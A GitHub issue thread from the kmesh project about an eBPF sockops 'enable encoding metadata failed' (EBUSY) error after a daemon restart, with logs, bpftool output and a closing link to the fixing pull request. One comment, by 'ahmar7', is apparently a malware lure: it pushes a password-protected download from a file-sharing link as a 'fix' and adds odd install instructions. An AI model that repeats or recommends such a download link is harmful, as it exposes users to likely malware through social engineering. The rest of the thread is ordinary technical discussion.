### ISSUE TITLE
enable encoding metadata failed

### ISSUE THREAD

**Issue by hzxuzhonghu** [kmesh-net/kmesh#774]
**What happened**:

time="2024-08-27T07:00:58Z" level=info msg="[SOCKOPS] ERR: enable encoding metadata failed!, err is -16" subsys=ebpf

This can be reproduced easily after kmesh daemon restart, so i doubt this is related to restart.

-16 means EBUSY, in this case it might be that the sock has already been updated with previous sockops prog

```
    err = bpf_sock_hash_update(skops, &map_of_kmesh_socket, &tuple_info, BPF_ANY);

32401: sock_ops  name sockops_prog  tag 12c1bb462bdbf449  gpl
	loaded_at 2024-08-27T14:54:57+0800  uid 0
	xlated 10328B  jited 5587B  memlock 12288B  map_ids 1753873,1753869,1753870,1753884,1753868,1753880,1753879,1753882,1753885,1753881
	btf_id 31982
--
32414: sock_ops  name sockops_prog  tag 12c1bb462bdbf449  gpl
	loaded_at 2024-08-27T15:00:17+0800  uid 0
	xlated 10328B  jited 5587B  memlock 12288B  map_ids 1753873,1753869,1753870,1753895,1753868,1753880,1753879,1753882,1753885,1753881
	btf_id 31994


```

**What you expected to happen**:

**How to reproduce it (as minimally and precisely as possible)**:

**Anything else we need to know?**:

**Environment**:
- Kmesh version:
- Others:

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by hzxuzhonghu** [comment]
Fixed by https://github.com/kmesh-net/kmesh/pull/763
